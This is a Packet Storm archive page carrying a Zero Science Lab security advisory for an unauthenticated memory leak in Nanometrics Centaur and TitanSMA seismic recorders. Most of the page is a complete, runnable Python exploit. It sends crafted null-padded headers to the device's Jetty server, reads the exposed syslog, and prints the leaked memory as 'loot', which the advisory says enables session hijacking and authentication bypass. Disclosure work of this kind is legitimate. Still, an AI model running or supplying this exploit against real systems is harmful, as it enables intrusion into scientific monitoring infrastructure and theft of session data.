exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak

Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak
Posted Feb 17, 2020
Authored by byteGoblin | Site zeroscience.mk

An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.

tags | exploit, memory leak, info disclosure
SHA-256 | 55eb430433523641ba5cf8b77fd53ad41657476cb305375f3e6a34c3ebb32cee

Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak

Change Mirror Download
Title: Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
Advisory ID: ZSL-2020-5562
Type: Local/Remote
Impact: System Access, DoS, Exposure of System Information, Exposure of Sensitive Information
Risk: (5/5)
Release Date: 15.02.2020

Summary

The Centaur digital recorder is a portable geophysical sensing acquisition system that consists of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. Its ease of use simplifies high performance geophysical sensing deployments in both remote and networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for infrasound and similar geophysical sensor recording applications requiring sample rates up to 5000 sps.

The TitanSMA is a strong motion accelerograph designed for high precision observational and structural engineering applications, where scientists and engineers require exceptional dynamic range over a wide frequency band.
Description
An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent packet) which can be combined to leak sensitive data which can be used to perform session hijacking and authentication bypass scenarios.

Vendor

Nanometrics Inc. - https://www.nanometrics.ca

Affected Version

Centaur <= 4.3.23
TitanSMA <= 4.2.20
Tested On
Jetty 9.4.z-SNAPSHOT

Vendor Status

[10.02.2020] Vulnerabilities discovered.
[10.02.2020] Vendor contacted.
[14.02.2020] No response from the vendor.
[15.02.2020] Public security advisory released.

PoC

#!/usr/bin/env python3
#
# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit
#
#
# Vendor: Nanometrics Inc.
# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma
# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder
#
# Affected versions:
# Centaur <= 4.3.23
# TitanSMA <= 4.2.20
#
# Summary:
# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists
# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.
# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and
# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for
# infrasound and similar geophysical sensor recording applications requiring sample rates up to
# 5000 sps.
#
# Summary:
# The TitanSMA is a strong motion accelerograph designed for high precision observational and
# structural engineering applications, where scientists and engineers require exceptional dynamic
# range over a wide frequency band.
#
# Description:
# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect
# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT)
# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224.
# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage.
# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP
# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system
# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent
# packet) which can be combined to leak sensitive data which can be used to perform session hijacking
# and authentication bypass scenarios.
#
# Tested on:
# Jetty 9.4.z-SNAPSHOT
#
# Vulnerability discovered by:
# byteGoblin @ zeroscience.mk
#
#
# Advisory ID: ZSL-2020-5562
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
#
# Related CVE: CVE-2015-2080
# Related CWE: CWE-532, CWE-538
#
# 10.02.2020
#

import requests
import re
import sys

class Goblin:
def __init__(self):
self.host = None
self.page = "/zsl"
self.syslog = "/logs/syslog"
self.buffer_pad = "A" * 70
self.buffer = None
self.payload = "\xFF"
self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results
self.body = {}
self.headers = None
self.syslog_data = {}
self.last_line = None
self.before_last_line = True

def banner(self):
goblin = """
NN
NkllON
0;;::k000XN KxllokN
0;,:,;;;;:ldK Kdccc::oK
Nx,';codddl:::dkdc:c:;lON
klc:clloooooooc,.':lc;'lX
x;:ooololccllc:,:ll:,:xX
Kd:cllc'..';:ccclc,.x _ . ___ _ .
NOoc::c:,'';:ccllc::''k \ ___ , . _/_ ___ .' \ __. \ ___ | ` , __
Nklc:clccc;.;odoollc:',xN |/ \ | ` | .' ` | .' \ |/ \ | | |' `.
0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |
0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \__/ `.___, `.___| `._.' `___,' /\__ / / |
Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \___/
Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//
XxclkXk;'::,,,''';:::;'''...'',:o0
Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin
O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk
Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K
d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca
Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA
d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20
0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK
0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A
0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php
:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0
x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product
Xx:,'':xk:..,''lK Y k;';;';xX
XOkkko'.....'O d.';;,,:xN
0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._
XOkkkkkON
"""
print(goblin)

def generate_payload(self, amount_of_bytes):
self.payload += "\x00" * amount_of_bytes
self.headers = {"Cookie": self.buffer_pad, "Referer": self.payload}

def read_syslog(self, initial=False):
# Read syslog remotely and filter out 'HeapByteBuffer' messages.
# 'initial' is used to make a 'snapshot' of the state before we send payloads...
# That way we can filter on what we've just sent.
print("[!] - Grabbing syslog from: {}{}".format(self.host, self.syslog))
buffer = ""
r = requests.get(self.host + self.syslog)
if r.status_code == 200:
print("[!] - We got syslog, it is: {} bytes".format(len(r.content)))
split = r.text.split("\n")
for line in split:
if "HeapByteBuffer" in line:
if initial:
self.last_line = line
else:
if line == self.last_line:
self.before_last_line = False
if not self.before_last_line:
buffer_addr = re.search("\@\w+", line).group(0).strip("@")
try:
leak = re.search(">>>.+(?=\.\.\.)", line).group(0).strip(">>>")
buffer += leak
except Exception as e:
print(e)
if initial:
return self.last_line
self.buffer = buffer
else: # we can't access syslog?
print("[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...")
print("[!!!] - The status code we got was: {}".format(r.status_code))
exit(-1)

def show_output(self):
# we need to translate '\r\n' into actual newlines
if self.buffer is not None and self.buffer is not "":
self.buffer = self.buffer.replace("\\n", "\n")
self.buffer = self.buffer.replace("\\r", "\r")
self.buffer = self.buffer.replace("%2f", "/")

print("[*] BUFFER LENGTH: {}".format(len(self.buffer)))
print("=" * 50)
print("[*] THIS IS THE LOOT")
print("=" * 50)
for num, x in enumerate(self.buffer.split("\n")):
print("{}.\t| \t{}".format(num, x))

def send_payload(self, amount):
print("[!] - Sending payloads to target: {}{}".format(self.host, self.page))
if amount > self.payloads_to_send or amount < 0:
amount = self.payloads_to_send
for num, x in enumerate(range(0, amount)):
if num % 10 == 0:
print("[!] - [{}/{}] payloads sent...".format(num, amount))
try:
self.generate_payload(17)
r = requests.post(self.host + self.page, data=self.body, headers=self.headers)
except Exception as e:
print(e)
print("[!] - [{}/{}] payloads sent...".format(amount, amount))

def parse_sys_args(self):
if len(sys.argv) >= 2:
self.host = sys.argv[1]
if not "http" in self.host:
self.host = "https://{}".format(self.host)
if len(sys.argv) == 3:
# amount of packets to send
self.payloads_to_send = sys.argv[2]
else:
self.print_help()

def print_help(self):
print("Usage: {} <ip_addr[:port]> [amount of payloads to send]".format(sys.argv[0]))
print("Example: centaur3.py 123.456.789.0:8080 200")
print("\tThis will send 200 payloads to the aforementioned host")
print("\tThe [port] and [amount of payloads] are optional")
exit(-1)

def main(self):
self.parse_sys_args()
self.banner()
ll = self.read_syslog(initial=True)
self.send_payload(70)
self.read_syslog()
self.show_output()

if __name__ == '__main__':
Goblin().main()

Credits

Vulnerability discovered by byteGoblin - <bytegoblin@zeroscience.mk>

References

[1] https://nvd.nist.gov/vuln/detail/CVE-2015-2080
[2] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php

Changelog

[15.02.2020] - Initial release

Contact

Zero Science Lab

Web: https://www.zeroscience.mk
e-mail: lab@zeroscience.mk
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close